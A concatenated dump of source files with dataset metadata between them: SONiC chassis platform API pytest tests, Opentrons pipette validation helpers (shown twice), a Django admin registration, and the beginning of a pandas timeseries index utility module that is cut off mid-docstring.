pytest_assert(component_list is not None, "Failed to retrieve components")
pytest_assert(isinstance(component_list, list) and len(component_list) == num_components, "Components appear to be incorrect")
for i in range(num_components):
component = chassis.get_component(platform_api_conn, i)
self.expect(component and component == component_list[i], "Component {} is incorrect".format(i))
self.assert_expectations()
def test_modules(self, duthost, localhost, platform_api_conn):
# TODO: Ensure the number of modules and that the returned list is correct for this platform
try:
num_modules = int(chassis.get_num_modules(platform_api_conn))
except:
pytest.fail("num_modules is not an integer")
module_list = chassis.get_all_modules(platform_api_conn)
pytest_assert(module_list is not None, "Failed to retrieve modules")
pytest_assert(isinstance(module_list, list) and len(module_list) == num_modules, "Modules appear to be incorrect")
for i in range(num_modules):
module = chassis.get_module(platform_api_conn, i)
self.expect(module and module == module_list[i], "Module {} is incorrect".format(i))
self.assert_expectations()
def test_fans(self, duthost, localhost, platform_api_conn):
# TODO: Ensure the number of fans and that the returned list is correct for this platform
try:
num_fans = int(chassis.get_num_fans(platform_api_conn))
except:
pytest.fail("num_fans is not an integer")
fan_list = chassis.get_all_fans(platform_api_conn)
pytest_assert(fan_list is not None, "Failed to retrieve fans")
pytest_assert(isinstance(fan_list, list) and len(fan_list) == num_fans, "Fans appear to be incorrect")
for i in range(num_fans):
fan = chassis.get_fan(platform_api_conn, i)
self.expect(fan and fan == fan_list[i], "Fan {} is incorrect".format(i))
self.assert_expectations()
def test_fan_drawers(self, duthost, localhost, platform_api_conn):
# TODO: Ensure the number of fan drawers and that the returned list is correct for this platform
try:
num_fan_drawers = int(chassis.get_num_fan_drawers(platform_api_conn))
except:
pytest.fail("num_fan_drawers is not an integer")
fan_drawer_list = chassis.get_all_fan_drawers(platform_api_conn)
pytest_assert(fan_drawer_list is not None, "Failed to retrieve fan drawers")
pytest_assert(isinstance(fan_drawer_list, list) and len(fan_drawer_list) == num_fan_drawers, "Fan drawerss appear to be incorrect")
for i in range(num_fan_drawers):
fan_drawer = chassis.get_fan_drawer(platform_api_conn, i)
self.expect(fan_drawer and fan_drawer == fan_drawer_list[i], "Fan drawer {} is incorrect".format(i))
self.assert_expectations()
def test_psus(self, duthost, localhost, platform_api_conn):
# TODO: Ensure the number of PSUs and that the returned list is correct for this platform
try:
num_psus = int(chassis.get_num_psus(platform_api_conn))
except:
pytest.fail("num_psus is not an integer")
psu_list = chassis.get_all_psus(platform_api_conn)
pytest_assert(psu_list is not None, "Failed to retrieve PSUs")
pytest_assert(isinstance(psu_list, list) and len(psu_list) == num_psus, "PSUs appear to be incorrect")
for i in range(num_psus):
psu = chassis.get_psu(platform_api_conn, i)
self.expect(psu and psu == psu_list[i], "PSU {} is incorrect".format(i))
self.assert_expectations()
def test_thermals(self, duthost, localhost, platform_api_conn):
# TODO: Ensure the number of thermals and that the returned list is correct for this platform
try:
num_thermals = int(chassis.get_num_thermals(platform_api_conn))
except:
pytest.fail("num_thermals is not an integer")
thermal_list = chassis.get_all_thermals(platform_api_conn)
pytest_assert(thermal_list is not None, "Failed to retrieve thermals")
pytest_assert(isinstance(thermal_list, list) and len(thermal_list) == num_thermals, "Thermals appear to be incorrect")
for i in range(num_thermals):
thermal = chassis.get_thermal(platform_api_conn, i)
self.expect(thermal and thermal == thermal_list[i], "Thermal {} is incorrect".format(i))
self.assert_expectations()
def test_sfps(self, duthost, localhost, platform_api_conn):
# TODO: Ensure the number of SFPs and that the returned list is correct for this platform
try:
num_sfps = int(chassis.get_num_sfps(platform_api_conn))
except:
pytest.fail("num_sfps is not an integer")
sfp_list = chassis.get_all_sfps(platform_api_conn)
pytest_assert(sfp_list is not None, "Failed to retrieve SFPs")
pytest_assert(isinstance(sfp_list, list) and len(sfp_list) == num_sfps, "SFPs appear to be incorrect")
for i in range(num_sfps):
sfp = chassis.get_sfp(platform_api_conn, i)
self.expect(sfp and sfp == sfp_list[i], "SFP {} is incorrect".format(i))
self.assert_expectations()
def test_status_led(self, duthost, localhost, platform_api_conn):
# TODO: Get a platform-specific list of available colors for the status LED
LED_COLOR_LIST = [
"off",
"red",
"amber",
"green",
]
for color in LED_COLOR_LIST:
result = chassis.set_status_led(platform_api_conn, color)
if self.expect(result is not None, "Failed to perform set_status_led"):
self.expect(result is True, "Failed to set status_led to {}".format(color))
color_actual = chassis.get_status_led(platform_api_conn)
if self.expect(color_actual is not None, "Failed to retrieve status_led"):
if self.expect(isinstance(color_actual, str), "Status LED color appears incorrect"):
self.expect(color == color_actual, "Status LED color incorrect (expected: {}, actual: {})".format(color, color_actual))
self.assert_expectations()
def test_get_thermal_manager(self, duthost, localhost, platform_api_conn):
thermal_mgr = chassis.get_thermal_manager(platform_api_conn)
pytest_assert(thermal_mgr is not None, "Failed to retrieve thermal manager")
def test_get_watchdog(self, duthost, localhost, platform_api_conn):
watchdog = chassis.get_watchdog(platform_api_conn)
pytest_assert(watchdog is not None, "Failed to retrieve watchdog")
def test_get_eeprom(self, duthost, localhost, platform_api_conn):
eeprom = chassis.get_eeprom(platform_api_conn)
pytest_assert(eeprom is not None, "Failed to retrieve system EEPROM")
| 52.317757
| 146
| 0.711742
|
import logging
import re
import pytest
import yaml
from tests.common.helpers.assertions import pytest_assert
from tests.common.helpers.platform_api import chassis
from platform_api_test_base import PlatformApiTestBase
logger = logging.getLogger(__name__)
pytestmark = [
pytest.mark.disable_loganalyzer,
pytest.mark.topology('any')
]
REGEX_MAC_ADDRESS = r'^([0-9A-Fa-f]{2}:){5}([0-9A-Fa-f]{2})$'
REGEX_SERIAL_NUMBER = r'^[A-Za-z0-9]+$'
ONIE_TLVINFO_TYPE_CODE_PRODUCT_NAME = '0x21'
ONIE_TLVINFO_TYPE_CODE_PART_NUMBER = '0x22'
ONIE_TLVINFO_TYPE_CODE_SERIAL_NUMBER = '0x23'
ONIE_TLVINFO_TYPE_CODE_BASE_MAC_ADDR = '0x24'
ONIE_TLVINFO_TYPE_CODE_MFR_DATE = '0x25'
ONIE_TLVINFO_TYPE_CODE_DEVICE_VERSION = '0x26'
ONIE_TLVINFO_TYPE_CODE_LABEL_REVISION = '0x27'
ONIE_TLVINFO_TYPE_CODE_PLATFORM_NAME = '0x28'
ONIE_TLVINFO_TYPE_CODE_ONIE_VERSION = '0x29'
ONIE_TLVINFO_TYPE_CODE_NUM_MACS = '0x2A'
ONIE_TLVINFO_TYPE_CODE_MANUFACTURER = '0x2B'
ONIE_TLVINFO_TYPE_CODE_COUNTRY_CODE = '0x2C'
ONIE_TLVINFO_TYPE_CODE_VENDOR = '0x2D'
ONIE_TLVINFO_TYPE_CODE_DIAG_VERSION = '0x2E'
ONIE_TLVINFO_TYPE_CODE_SERVICE_TAG = '0x2F'
ONIE_TLVINFO_TYPE_CODE_VENDOR_EXT = '0xFD'
ONIE_TLVINFO_TYPE_CODE_CRC32 = '0xFE'
class TestChassisApi(PlatformApiTestBase):
def test_get_name(self, duthost, localhost, platform_api_conn):
name = chassis.get_name(platform_api_conn)
pytest_assert(name is not None, "Unable to retrieve chassis name")
pytest_assert(isinstance(name, str), "Chassis name appears incorrect")
def test_get_presence(self, duthost, localhost, platform_api_conn):
presence = chassis.get_presence(platform_api_conn)
pytest_assert(presence is not None, "Unable to retrieve chassis presence")
pytest_assert(isinstance(presence, bool), "Chassis presence appears incorrect")
pytest_assert(presence is True, "Chassis is not present")
def test_get_model(self, duthost, localhost, platform_api_conn):
model = chassis.get_model(platform_api_conn)
pytest_assert(model is not None, "Unable to retrieve chassis model")
pytest_assert(isinstance(model, str), "Chassis model appears incorrect")
def test_get_serial(self, duthost, localhost, platform_api_conn):
serial = chassis.get_serial(platform_api_conn)
pytest_assert(serial is not None, "Unable to retrieve chassis serial number")
pytest_assert(isinstance(serial, str), "Chassis serial number appears incorrect")
def test_get_status(self, duthost, localhost, platform_api_conn):
status = chassis.get_status(platform_api_conn)
pytest_assert(status is not None, "Unable to retrieve chassis status")
pytest_assert(isinstance(status, bool), "Chassis status appears incorrect")
def test_get_base_mac(self, duthost, localhost, platform_api_conn):
base_mac = chassis.get_base_mac(platform_api_conn)
pytest_assert(base_mac is not None, "Failed to retrieve base MAC address")
pytest_assert(re.match(REGEX_MAC_ADDRESS, base_mac), "Base MAC address appears to be incorrect")
if 'base_mac' in duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars:
expected_base_mac = duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars['base_mac']
pytest_assert(base_mac == expected_base_mac, "Base MAC address is incorrect")
else:
logger.warning('Inventory file does not contain base MAC address for {}'.format(duthost.hostname))
def test_get_serial_number(self, duthost, localhost, platform_api_conn):
serial = chassis.get_serial_number(platform_api_conn).rstrip('\x00')
pytest_assert(serial is not None, "Failed to retrieve serial number")
pytest_assert(re.match(REGEX_SERIAL_NUMBER, serial), "Serial number appears to be incorrect")
if 'serial' in duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars:
expected_serial = duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars['serial']
pytest_assert(serial == expected_serial, "Serial number is incorrect")
else:
logger.warning('Inventory file does not contain serial number for {}'.format(duthost.hostname))
def test_get_system_eeprom_info(self, duthost, localhost, platform_api_conn):
VALID_ONIE_TLVINFO_TYPE_CODES_LIST = [
ONIE_TLVINFO_TYPE_CODE_PRODUCT_NAME,
ONIE_TLVINFO_TYPE_CODE_PART_NUMBER,
ONIE_TLVINFO_TYPE_CODE_SERIAL_NUMBER,
ONIE_TLVINFO_TYPE_CODE_BASE_MAC_ADDR,
ONIE_TLVINFO_TYPE_CODE_MFR_DATE,
ONIE_TLVINFO_TYPE_CODE_DEVICE_VERSION,
ONIE_TLVINFO_TYPE_CODE_LABEL_REVISION,
ONIE_TLVINFO_TYPE_CODE_PLATFORM_NAME,
ONIE_TLVINFO_TYPE_CODE_ONIE_VERSION,
ONIE_TLVINFO_TYPE_CODE_NUM_MACS,
ONIE_TLVINFO_TYPE_CODE_MANUFACTURER,
ONIE_TLVINFO_TYPE_CODE_COUNTRY_CODE,
ONIE_TLVINFO_TYPE_CODE_VENDOR,
ONIE_TLVINFO_TYPE_CODE_DIAG_VERSION,
ONIE_TLVINFO_TYPE_CODE_SERVICE_TAG,
ONIE_TLVINFO_TYPE_CODE_VENDOR_EXT,
ONIE_TLVINFO_TYPE_CODE_CRC32
]
MINIMUM_REQUIRED_TYPE_CODES_LIST = [
ONIE_TLVINFO_TYPE_CODE_SERIAL_NUMBER,
ONIE_TLVINFO_TYPE_CODE_BASE_MAC_ADDR,
ONIE_TLVINFO_TYPE_CODE_CRC32
]
syseeprom_info_dict = chassis.get_system_eeprom_info(platform_api_conn)
pytest_assert(syseeprom_info_dict is not None, "Failed to retrieve system EEPROM data")
pytest_assert(isinstance(syseeprom_info_dict, dict), "System EEPROM data is not in the expected format")
syseeprom_type_codes_list = syseeprom_info_dict.keys()
pytest_assert(set(syseeprom_type_codes_list) <= set(VALID_ONIE_TLVINFO_TYPE_CODES_LIST), "Invalid TlvInfo type code found")
pytest_assert(set(MINIMUM_REQUIRED_TYPE_CODES_LIST) <= set(syseeprom_type_codes_list), "Minimum required TlvInfo type codes not provided")
base_mac = syseeprom_info_dict[ONIE_TLVINFO_TYPE_CODE_BASE_MAC_ADDR]
pytest_assert(base_mac is not None, "Failed to retrieve base MAC address")
pytest_assert(re.match(REGEX_MAC_ADDRESS, base_mac), "Base MAC address appears to be incorrect")
serial = syseeprom_info_dict[ONIE_TLVINFO_TYPE_CODE_SERIAL_NUMBER]
pytest_assert(serial is not None, "Failed to retrieve serial number")
pytest_assert(re.match(REGEX_SERIAL_NUMBER, serial), "Serial number appears to be incorrect")
if 'syseeprom_info' in duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars:
expected_syseeprom_info_dict = duthost.host.options['inventory_manager'].get_host(duthost.hostname).vars['syseeprom_info']
pytest_assert(syseeprom_info_dict == expected_syseeprom_info_dict, "System EEPROM info is incorrect")
else:
logger.warning('Inventory file does not contain system EEPROM info for {}'.format(duthost.hostname))
def test_get_reboot_cause(self, duthost, localhost, platform_api_conn):
reboot_cause = chassis.get_reboot_cause(platform_api_conn)
# to make the call and it uses JSON, the tuple is changed to a list
pytest_assert(reboot_cause is not None, "Failed to retrieve reboot cause")
pytest_assert(isinstance(reboot_cause, list) and len(reboot_cause) == 2, "Reboot cause appears to be incorrect")
def test_components(self, duthost, localhost, platform_api_conn):
# TODO: Ensure the number of components and that the returned list is correct for this platform
try:
num_components = int(chassis.get_num_components(platform_api_conn))
except:
pytest.fail("num_components is not an integer")
component_list = chassis.get_all_components(platform_api_conn)
pytest_assert(component_list is not None, "Failed to retrieve components")
pytest_assert(isinstance(component_list, list) and len(component_list) == num_components, "Components appear to be incorrect")
for i in range(num_components):
component = chassis.get_component(platform_api_conn, i)
self.expect(component and component == component_list[i], "Component {} is incorrect".format(i))
self.assert_expectations()
def test_modules(self, duthost, localhost, platform_api_conn):
# TODO: Ensure the number of modules and that the returned list is correct for this platform
try:
num_modules = int(chassis.get_num_modules(platform_api_conn))
except:
pytest.fail("num_modules is not an integer")
module_list = chassis.get_all_modules(platform_api_conn)
pytest_assert(module_list is not None, "Failed to retrieve modules")
pytest_assert(isinstance(module_list, list) and len(module_list) == num_modules, "Modules appear to be incorrect")
for i in range(num_modules):
module = chassis.get_module(platform_api_conn, i)
self.expect(module and module == module_list[i], "Module {} is incorrect".format(i))
self.assert_expectations()
def test_fans(self, duthost, localhost, platform_api_conn):
# TODO: Ensure the number of fans and that the returned list is correct for this platform
try:
num_fans = int(chassis.get_num_fans(platform_api_conn))
except:
pytest.fail("num_fans is not an integer")
fan_list = chassis.get_all_fans(platform_api_conn)
pytest_assert(fan_list is not None, "Failed to retrieve fans")
pytest_assert(isinstance(fan_list, list) and len(fan_list) == num_fans, "Fans appear to be incorrect")
for i in range(num_fans):
fan = chassis.get_fan(platform_api_conn, i)
self.expect(fan and fan == fan_list[i], "Fan {} is incorrect".format(i))
self.assert_expectations()
def test_fan_drawers(self, duthost, localhost, platform_api_conn):
# TODO: Ensure the number of fan drawers and that the returned list is correct for this platform
try:
num_fan_drawers = int(chassis.get_num_fan_drawers(platform_api_conn))
except:
pytest.fail("num_fan_drawers is not an integer")
fan_drawer_list = chassis.get_all_fan_drawers(platform_api_conn)
pytest_assert(fan_drawer_list is not None, "Failed to retrieve fan drawers")
pytest_assert(isinstance(fan_drawer_list, list) and len(fan_drawer_list) == num_fan_drawers, "Fan drawerss appear to be incorrect")
for i in range(num_fan_drawers):
fan_drawer = chassis.get_fan_drawer(platform_api_conn, i)
self.expect(fan_drawer and fan_drawer == fan_drawer_list[i], "Fan drawer {} is incorrect".format(i))
self.assert_expectations()
def test_psus(self, duthost, localhost, platform_api_conn):
# TODO: Ensure the number of PSUs and that the returned list is correct for this platform
try:
num_psus = int(chassis.get_num_psus(platform_api_conn))
except:
pytest.fail("num_psus is not an integer")
psu_list = chassis.get_all_psus(platform_api_conn)
pytest_assert(psu_list is not None, "Failed to retrieve PSUs")
pytest_assert(isinstance(psu_list, list) and len(psu_list) == num_psus, "PSUs appear to be incorrect")
for i in range(num_psus):
psu = chassis.get_psu(platform_api_conn, i)
self.expect(psu and psu == psu_list[i], "PSU {} is incorrect".format(i))
self.assert_expectations()
def test_thermals(self, duthost, localhost, platform_api_conn):
# TODO: Ensure the number of thermals and that the returned list is correct for this platform
try:
num_thermals = int(chassis.get_num_thermals(platform_api_conn))
except:
pytest.fail("num_thermals is not an integer")
thermal_list = chassis.get_all_thermals(platform_api_conn)
pytest_assert(thermal_list is not None, "Failed to retrieve thermals")
pytest_assert(isinstance(thermal_list, list) and len(thermal_list) == num_thermals, "Thermals appear to be incorrect")
for i in range(num_thermals):
thermal = chassis.get_thermal(platform_api_conn, i)
self.expect(thermal and thermal == thermal_list[i], "Thermal {} is incorrect".format(i))
self.assert_expectations()
def test_sfps(self, duthost, localhost, platform_api_conn):
# TODO: Ensure the number of SFPs and that the returned list is correct for this platform
try:
num_sfps = int(chassis.get_num_sfps(platform_api_conn))
except:
pytest.fail("num_sfps is not an integer")
sfp_list = chassis.get_all_sfps(platform_api_conn)
pytest_assert(sfp_list is not None, "Failed to retrieve SFPs")
pytest_assert(isinstance(sfp_list, list) and len(sfp_list) == num_sfps, "SFPs appear to be incorrect")
for i in range(num_sfps):
sfp = chassis.get_sfp(platform_api_conn, i)
self.expect(sfp and sfp == sfp_list[i], "SFP {} is incorrect".format(i))
self.assert_expectations()
def test_status_led(self, duthost, localhost, platform_api_conn):
# TODO: Get a platform-specific list of available colors for the status LED
LED_COLOR_LIST = [
"off",
"red",
"amber",
"green",
]
for color in LED_COLOR_LIST:
result = chassis.set_status_led(platform_api_conn, color)
if self.expect(result is not None, "Failed to perform set_status_led"):
self.expect(result is True, "Failed to set status_led to {}".format(color))
color_actual = chassis.get_status_led(platform_api_conn)
if self.expect(color_actual is not None, "Failed to retrieve status_led"):
if self.expect(isinstance(color_actual, str), "Status LED color appears incorrect"):
self.expect(color == color_actual, "Status LED color incorrect (expected: {}, actual: {})".format(color, color_actual))
self.assert_expectations()
def test_get_thermal_manager(self, duthost, localhost, platform_api_conn):
thermal_mgr = chassis.get_thermal_manager(platform_api_conn)
pytest_assert(thermal_mgr is not None, "Failed to retrieve thermal manager")
def test_get_watchdog(self, duthost, localhost, platform_api_conn):
watchdog = chassis.get_watchdog(platform_api_conn)
pytest_assert(watchdog is not None, "Failed to retrieve watchdog")
def test_get_eeprom(self, duthost, localhost, platform_api_conn):
eeprom = chassis.get_eeprom(platform_api_conn)
pytest_assert(eeprom is not None, "Failed to retrieve system EEPROM")
| true
| true
|
f705088ca6ef0bf0d1e239d32b41a163dbc29fd3
| 5,189
|
py
|
Python
|
api/src/opentrons/protocols/api_support/instrument.py
|
mrakitin/opentrons
|
d9c7ed23d13cdb62bd1bc397dc2871d4bd5b77e9
|
[
"Apache-2.0"
] | null | null | null |
api/src/opentrons/protocols/api_support/instrument.py
|
mrakitin/opentrons
|
d9c7ed23d13cdb62bd1bc397dc2871d4bd5b77e9
|
[
"Apache-2.0"
] | null | null | null |
api/src/opentrons/protocols/api_support/instrument.py
|
mrakitin/opentrons
|
d9c7ed23d13cdb62bd1bc397dc2871d4bd5b77e9
|
[
"Apache-2.0"
] | null | null | null |
import logging
from typing import Optional, Any
from opentrons import types
from opentrons.calibration_storage import get
from opentrons.calibration_storage.types import TipLengthCalNotFound
from opentrons.hardware_control.dev_types import PipetteDict
from opentrons.protocol_api.labware import Labware, Well
from opentrons.protocols.api_support.types import APIVersion
from opentrons_shared_data.protocol.dev_types import LiquidHandlingCommand, \
BlowoutLocation
def validate_blowout_location(
api_version: APIVersion,
liquid_handling_command: LiquidHandlingCommand,
blowout_location: Optional[Any]) -> None:
"""Validate the blowout location."""
if blowout_location and api_version < APIVersion(2, 8):
raise ValueError(
'Cannot specify blowout location when using api' +
' version below 2.8, current version is {api_version}'
.format(api_version=api_version))
elif liquid_handling_command == 'consolidate' \
and blowout_location == 'source well':
raise ValueError(
"blowout location for consolidate cannot be source well")
elif liquid_handling_command == 'distribute' \
and blowout_location == 'destination well':
raise ValueError(
"blowout location for distribute cannot be destination well")
elif liquid_handling_command == 'transfer' and \
blowout_location and \
blowout_location not in \
[location.value for location in BlowoutLocation]:
raise ValueError(
"blowout location should be either 'source well', " +
" 'destination well', or 'trash'" +
f" but it is {blowout_location}")
def tip_length_for(pipette: PipetteDict, tiprack: Labware) -> float:
""" Get the tip length, including overlap, for a tip from this rack """
def _build_length_from_overlap() -> float:
tip_overlap = pipette['tip_overlap'].get(
tiprack.uri,
pipette['tip_overlap']['default'])
tip_length = tiprack.tip_length
return tip_length - tip_overlap
try:
return get.load_tip_length_calibration(
pipette['pipette_id'],
tiprack._implementation.get_definition()
).tip_length
except TipLengthCalNotFound:
return _build_length_from_overlap()
VALID_PIP_TIPRACK_VOL = {
'p10': [10, 20],
'p20': [10, 20],
'p50': [200, 300],
'p300': [200, 300],
'p1000': [1000]
}
def validate_tiprack(
instrument_name: str,
tiprack: Labware,
log: logging.Logger) -> None:
"""Validate a tiprack logging a warning message."""
# TODO AA 2020-06-24 - we should instead add the acceptable Opentrons
# tipracks to the pipette as a refactor
if tiprack._implementation.get_definition()['namespace'] \
== 'opentrons':
tiprack_vol = tiprack.wells()[0].max_volume
valid_vols = VALID_PIP_TIPRACK_VOL[instrument_name.split('_')[0]]
if tiprack_vol not in valid_vols:
log.warning(
f'The pipette {instrument_name} and its tiprack '
f'{tiprack.load_name} in slot {tiprack.parent} appear to '
'be mismatched. Please check your protocol before running '
'on the robot.')
def determine_drop_target(
api_version: APIVersion,
location: Well,
return_height: float,
version_breakpoint: APIVersion = None) -> types.Location:
"""Determine the drop target based on well and api version."""
version_breakpoint = version_breakpoint or APIVersion(2, 2)
if api_version < version_breakpoint:
bot = location.bottom()
return types.Location(
point=bot.point._replace(z=bot.point.z + 10),
labware=location)
else:
tr = location.parent
assert tr.is_tiprack
z_height = return_height * tr.tip_length
return location.top(-z_height)
def validate_can_aspirate(location: types.Location) -> None:
""" Can one aspirate on the given `location` or not? This method is
pretty basic and will probably remain so (?) as the future holds neat
ambitions for how validation is implemented. And as robots become more
intelligent more rigorous testing will be possible
Args:
location: target for aspiration
Raises:
RuntimeError:
"""
if _is_tiprack(location):
raise RuntimeError("Cannot aspirate a tiprack")
def validate_can_dispense(location: types.Location) -> None:
""" Can one dispense to the given `location` or not? This method is
pretty basic and will probably remain so (?) as the future holds neat
ambitions for how validation is implemented. And as robots become more
intelligent more rigorous testing will be possible
Args:
location: target for dispense
Raises:
RuntimeError:
"""
if _is_tiprack(location):
raise RuntimeError("Cannot dispense to a tiprack")
def _is_tiprack(location: types.Location) -> bool:
labware = location.labware.as_labware()
return labware.parent and labware.parent.is_tiprack
| 36.034722
| 77
| 0.671035
|
import logging
from typing import Optional, Any
from opentrons import types
from opentrons.calibration_storage import get
from opentrons.calibration_storage.types import TipLengthCalNotFound
from opentrons.hardware_control.dev_types import PipetteDict
from opentrons.protocol_api.labware import Labware, Well
from opentrons.protocols.api_support.types import APIVersion
from opentrons_shared_data.protocol.dev_types import LiquidHandlingCommand, \
BlowoutLocation
def validate_blowout_location(
api_version: APIVersion,
liquid_handling_command: LiquidHandlingCommand,
blowout_location: Optional[Any]) -> None:
if blowout_location and api_version < APIVersion(2, 8):
raise ValueError(
'Cannot specify blowout location when using api' +
' version below 2.8, current version is {api_version}'
.format(api_version=api_version))
elif liquid_handling_command == 'consolidate' \
and blowout_location == 'source well':
raise ValueError(
"blowout location for consolidate cannot be source well")
elif liquid_handling_command == 'distribute' \
and blowout_location == 'destination well':
raise ValueError(
"blowout location for distribute cannot be destination well")
elif liquid_handling_command == 'transfer' and \
blowout_location and \
blowout_location not in \
[location.value for location in BlowoutLocation]:
raise ValueError(
"blowout location should be either 'source well', " +
" 'destination well', or 'trash'" +
f" but it is {blowout_location}")
def tip_length_for(pipette: PipetteDict, tiprack: Labware) -> float:
def _build_length_from_overlap() -> float:
tip_overlap = pipette['tip_overlap'].get(
tiprack.uri,
pipette['tip_overlap']['default'])
tip_length = tiprack.tip_length
return tip_length - tip_overlap
try:
return get.load_tip_length_calibration(
pipette['pipette_id'],
tiprack._implementation.get_definition()
).tip_length
except TipLengthCalNotFound:
return _build_length_from_overlap()
VALID_PIP_TIPRACK_VOL = {
'p10': [10, 20],
'p20': [10, 20],
'p50': [200, 300],
'p300': [200, 300],
'p1000': [1000]
}
def validate_tiprack(
instrument_name: str,
tiprack: Labware,
log: logging.Logger) -> None:
if tiprack._implementation.get_definition()['namespace'] \
== 'opentrons':
tiprack_vol = tiprack.wells()[0].max_volume
valid_vols = VALID_PIP_TIPRACK_VOL[instrument_name.split('_')[0]]
if tiprack_vol not in valid_vols:
log.warning(
f'The pipette {instrument_name} and its tiprack '
f'{tiprack.load_name} in slot {tiprack.parent} appear to '
'be mismatched. Please check your protocol before running '
'on the robot.')
def determine_drop_target(
api_version: APIVersion,
location: Well,
return_height: float,
version_breakpoint: APIVersion = None) -> types.Location:
version_breakpoint = version_breakpoint or APIVersion(2, 2)
if api_version < version_breakpoint:
bot = location.bottom()
return types.Location(
point=bot.point._replace(z=bot.point.z + 10),
labware=location)
else:
tr = location.parent
assert tr.is_tiprack
z_height = return_height * tr.tip_length
return location.top(-z_height)
def validate_can_aspirate(location: types.Location) -> None:
if _is_tiprack(location):
raise RuntimeError("Cannot aspirate a tiprack")
def validate_can_dispense(location: types.Location) -> None:
if _is_tiprack(location):
raise RuntimeError("Cannot dispense to a tiprack")
def _is_tiprack(location: types.Location) -> bool:
labware = location.labware.as_labware()
return labware.parent and labware.parent.is_tiprack
| true
| true
|
f70508c8381da2991bd613dc3eb8473318c12f5a
| 436
|
py
|
Python
|
cookies/admin.py
|
ADpDinamo/site
|
d7313cd6c151a381ccc803b81768673587cb8d45
|
[
"Apache-2.0"
] | null | null | null |
cookies/admin.py
|
ADpDinamo/site
|
d7313cd6c151a381ccc803b81768673587cb8d45
|
[
"Apache-2.0"
] | 8
|
2021-03-19T10:14:39.000Z
|
2022-03-12T00:24:41.000Z
|
cookies/admin.py
|
ADpDinamo/site
|
d7313cd6c151a381ccc803b81768673587cb8d45
|
[
"Apache-2.0"
] | null | null | null |
from django.contrib import admin
from .models import CookiePageText, TOSPageText, StatutPageText
# Register your models here.
class CookieAdmin(admin.ModelAdmin):
pass
class TOSPageTextAdmin(admin.ModelAdmin):
pass
class StatutPageTextAdmin(admin.ModelAdmin):
pass
admin.site.register(CookiePageText, CookieAdmin)
admin.site.register(TOSPageText, TOSPageTextAdmin)
admin.site.register(StatutPageText, StatutPageTextAdmin)
| 29.066667
| 63
| 0.823394
|
from django.contrib import admin
from .models import CookiePageText, TOSPageText, StatutPageText
class CookieAdmin(admin.ModelAdmin):
pass
class TOSPageTextAdmin(admin.ModelAdmin):
pass
class StatutPageTextAdmin(admin.ModelAdmin):
pass
admin.site.register(CookiePageText, CookieAdmin)
admin.site.register(TOSPageText, TOSPageTextAdmin)
admin.site.register(StatutPageText, StatutPageTextAdmin)
| true
| true
|
f7050908f1d5cb294790a504bf31adbcb7c5b54b
| 41,157
|
py
|
Python
|
src/pyg_base/_pandas.py
|
nclarey/pyg-base
|
a7b90ea2ad4d740d8e7f8c4a7c9d341d36373862
|
[
"MIT"
] | null | null | null |
src/pyg_base/_pandas.py
|
nclarey/pyg-base
|
a7b90ea2ad4d740d8e7f8c4a7c9d341d36373862
|
[
"MIT"
] | null | null | null |
src/pyg_base/_pandas.py
|
nclarey/pyg-base
|
a7b90ea2ad4d740d8e7f8c4a7c9d341d36373862
|
[
"MIT"
] | null | null | null |
"""
We want to simplify the operations for pandas dataframes assuming we are using timeseries as the main objects.
When we have multiple timeseries, we will:
1) calculate joint index using df_index()
2) reindex each timeseries to the joint index
We then need to worry about multiple columns if there are. If none, each timeseries will be considered as pd.Series
If there are multiple columns, we will perform the calculations columns by columns.
"""
from pyg_base._types import is_df, is_str, is_num, is_tss, is_int, is_arr, is_ts, is_arrs, is_tuples, is_pd
from pyg_base._dictable import dictable
from pyg_base._as_list import as_list
from pyg_base._zip import zipper
from pyg_base._reducer import reducing, reducer
from pyg_base._decorators import wrapper
from pyg_base._loop import loop
from pyg_base._dates import dt
import pandas as pd
import numpy as np
from copy import copy
import inspect
import datetime
from operator import add, mul
__all__ = ['df_fillna', 'df_index', 'df_reindex', 'df_columns', 'presync', 'np_reindex', 'nona', 'df_slice', 'df_unslice', 'min_', 'max_', 'add_', 'mul_', 'sub_', 'div_', 'pow_']
def _list(values):
"""
>>> assert _list([1,2,[3,4,5,[6,7]],dict(a =[8,9], b=[10,[11,12]])]) == [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]
>>> assert _list(1) == [1]
>>> assert _list(dict(a=1, b=2)) == [1,2]
"""
if isinstance(values, list):
return sum([_list(df) for df in values], [])
elif isinstance(values, dict):
return _list(list(values.values()))
else:
return [values]
@loop(list, tuple, dict)
def _index(ts):
if isinstance(ts, pd.Index):
return ts
elif is_pd(ts):
return ts.index
elif is_arr(ts):
return len(ts)
else:
raise ValueError('did not provide an index')
def _df_index(indexes, index):
if len(indexes) > 0:
if is_str(index):
if index[0].lower() == 'i':#nner
return reducing('intersection')(indexes)
elif index[0].lower() == 'o':#uter
return reducing('union')(indexes)
elif index[0].lower() == 'l':#uter
return indexes[0]
elif index[0].lower() == 'r':#uter
return indexes[-1]
else:
return _index(index)
else:
return None
def _np_index(indexes, index):
if len(indexes) > 0:
if index[0].lower() == 'i':#nner
return min(indexes)
elif index[0].lower() == 'o':#uter
return max(indexes)
elif index[0].lower() == 'l':#uter
return indexes[0]
elif index[0].lower() == 'r':#uter
return indexes[-1]
else:
return None
def df_index(seq, index = 'inner'):
"""
Determines a joint index of multiple timeseries objects.
:Parameters:
----------------
seq : sequence whose index needs to be determined
a (possible nested) sequence of timeseries/non-timeseries object within lists/dicts
index : str, optional
method to determine the index. The default is 'inner'.
:Returns:
-------
pd.Index
The joint index.
:Example:
---------
>>> tss = [pd.Series(np.random.normal(0,1,10), drange(-i, 9-i)) for i in range(5)]
>>> more_tss_as_dict = dict(zip('abcde',[pd.Series(np.random.normal(0,1,10), drange(-i, 9-i)) for i in range(5)]))
>>> res = df_index(tss + [more_tss_as_dict], 'inner')
>>> assert len(res) == 6
>>> res = df_index(more_tss_as_dict, 'outer')
>>> assert len(res) == 14
"""
listed = _list(seq)
indexes = [ts.index for ts in listed if is_pd(ts)]
if len(indexes):
return _df_index(indexes, index)
arrs = [len(ts) for ts in listed if is_arr(ts)]
if len(arrs):
return _np_index(arrs, index)
else:
return None
def df_columns(seq, index = 'inner'):
"""
returns the columns of the joint object
:Example:
---------
>>> a = pd.DataFrame(np.random.normal(0,1,(100,5)), drange(-99), list('abcde'))
